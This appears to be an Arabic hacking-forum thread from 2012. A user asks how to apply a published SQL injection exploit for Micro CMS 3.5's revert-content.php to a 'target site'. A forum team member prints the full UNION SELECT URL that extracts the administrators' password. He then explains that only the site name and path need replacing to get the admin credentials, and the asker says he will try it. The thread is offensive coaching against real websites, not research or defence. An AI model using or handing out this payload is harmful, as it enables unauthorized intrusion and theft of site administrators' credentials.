التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-24-2012, 05:30 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية tiger_romnci
 

 

 
إحصائية العضو






tiger_romnci غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
tiger_romnci is on a distinguished road

افتراضي غير مجاب: رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)


بسم الله الرحمن الرحيم


انا كنت عملت موضوع سالت فيه عن استغلال السغرة

Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability

ولكن يبدو اني قد اخطاءت في طريقة السوال

فان اقصد

شرح الاستغلال مثال


http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SE LECT%20null,null,SUBSTRING(administrators_pass,1,1 6),null,null%20FROM%20microcms_administrators/*
================================================== ================================================== ================================================== ======================================

هذا هو الاستغلال
site.com= الموقع المصاب

فماذا يقصد ب
newest=؟

او بمعني اخر كيفيتة تريكب السغرة

ارجو اضافة موقع علي الثغرة

وكافة المتغيرات بحيث استطيع فهم السغرة ووضع متغيرات موقعي المستهدف

وشكرا لكم


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC v[hx avp hsjyghg Micro CMS 3>5 (revert-content>php)

التوقيع

لم أفعل شئ !!!
غير أنني اعترفت بالحقيقة التي يخاف منها الجميع أنا لست بفارس أحلامك
ولم أكون لي لحظة فارس احلام حتى لقصة خيالية لا يتجرأ قارئ على المخاطرة بقرائتها
انا الذي فقدته الايام وحذفته من حساباتها
انا المعتوه بقصص التاريخ وعلى حجارة الاساطير
انا الذي صدقت بان هناك أخ وهناك حمية وهناك شئ أسمه الانسانية
انا الذي اعترفت بان لي خطية بانني ولدت بعصر يقدس الهوي

http://desmond.imageshack.us/Himg17/...ng&res=landing

 

   

رد مع اقتباس
قديم 10-24-2012, 10:07 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي رد: رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)


اقتباس
http://www.site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1" UNION ALL SE LECT null,null,SUBSTRING(administrators_pass,1,1 6),null,null FROM microcms_administrators/*

رح افترض انك انسان فاهم بنيه المواقع
xxxxxxxxxxx.com = اسم الموقع
/xxxxxx/ = مسارات على الموقع (اسماء مجلدات)

الفكره بالثغره هنا
اذا لقيت موقع مركب السكربت الي اسمو
Micro CMS 3.5
كل ما عليك تستببدل من الرابط فوق
site = حط بدالها اسم الموقع
[micro_cms] = مسار السكربت ( قد لا يلزم وقد يكون مثلا /home/ او /index/ او /site/ كل موقع يختلف عن الاخر

الباقي لا تغير فيه شيء وافتح الرابط المفترض تلقى باسورد الادمن واليوزر قدامك لو فهمت علي ^_^
في حال ما فهمت شو قصدي
مشكلتك مش بالهاك
مشكلتك انك ما بتعرف كيف بنيه المواقع او انك عمرك ما ركبت موقع
وكان شرط اساسي من شروط دوراتنا انك تكون امتلكت موقع ولو مجاني وانت تركبه بنفسك وكذاا
الصعود الى القمه يبدا خطوه بخطوه
بالتوفيق
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 10-24-2012, 06:31 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية tiger_romnci
 

 

 
إحصائية العضو






tiger_romnci غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
tiger_romnci is on a distinguished road

افتراضي رد: رجاء شرح استغلال Micro CMS 3.5 (revert-content.php)


مشكور كتير ورااح اجربي وارجعلك تاني يا كبير

شكرااااااا

التوقيع

لم أفعل شئ !!!
غير أنني اعترفت بالحقيقة التي يخاف منها الجميع أنا لست بفارس أحلامك
ولم أكون لي لحظة فارس احلام حتى لقصة خيالية لا يتجرأ قارئ على المخاطرة بقرائتها
انا الذي فقدته الايام وحذفته من حساباتها
انا المعتوه بقصص التاريخ وعلى حجارة الاساطير
انا الذي صدقت بان هناك أخ وهناك حمية وهناك شئ أسمه الانسانية
انا الذي اعترفت بان لي خطية بانني ولدت بعصر يقدس الهوي

http://desmond.imageshack.us/Himg17/...ng&res=landing

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:58 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0